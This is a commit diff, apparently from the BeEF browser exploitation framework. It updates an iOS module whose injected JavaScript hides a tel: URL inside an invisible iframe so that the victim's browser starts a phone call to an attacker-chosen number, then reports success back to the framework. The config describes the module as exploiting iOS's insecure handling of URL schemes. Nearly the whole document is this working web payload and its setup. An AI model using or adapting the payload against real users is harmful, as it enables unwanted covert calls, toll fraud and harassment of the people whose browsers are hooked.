(Fixes issue 572): iPhone telephone module does not use skype, use hidden iframe dom code
This commit is contained in:
@@ -14,7 +14,8 @@
|
||||
// limitations under the License.
|
||||
//
|
||||
beef.execute(function() {
|
||||
document.body.innerHTML = "<iframe src=tel:<%= @tel_num %>></iframe>";
|
||||
var sploit = beef.dom.createInvisibleIframe();
|
||||
sploit.src = 'tel:<%= @tel_num %>';
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!");
|
||||
});
|
||||
|
||||
@@ -18,8 +18,8 @@ beef:
|
||||
iphone_tel:
|
||||
enable: true
|
||||
category: "Host"
|
||||
name: "Make Skype Call (Tel)"
|
||||
description: "This module will force the browser to attempt a skype call. It will exploit the insecure handling of URL schemes in iOS.<br><br>The protocol handler used will be: tel"
|
||||
name: "Make Telephone Call"
|
||||
description: "This module will force the browser to attempt a telephone call in iOS. It will exploit the insecure handling of URL schemes in iOS.<br><br>The protocol handler used will be: tel"
|
||||
authors: ["xntrik", "Nitesh Dhanjani"]
|
||||
target:
|
||||
working: ['S']
|
||||
user_notify: ['S']
|
||||
|
||||
Reference in New Issue
Block a user